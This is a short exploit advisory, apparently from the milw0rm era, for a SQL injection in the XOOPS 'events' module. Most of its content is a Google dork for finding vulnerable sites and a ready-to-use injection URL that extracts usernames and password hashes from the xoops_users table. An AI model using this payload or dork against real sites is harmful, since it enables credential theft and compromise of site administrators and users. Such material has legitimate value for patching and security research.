The XOOPS events module suffers from a remote SQL injection vulnerability.
d88a9171146c13642f4b28dad8c4e3b6be17c6c21720c1aabe0d07253ac24555
###############################################################
#
# XOOPS Module events SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl :"modules/events/index.php?op=show"
#
# DORK 2 : allinurl:
#
################################################################
EXPLOIT :
modules/events/index.php?op=show&id=-6666+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################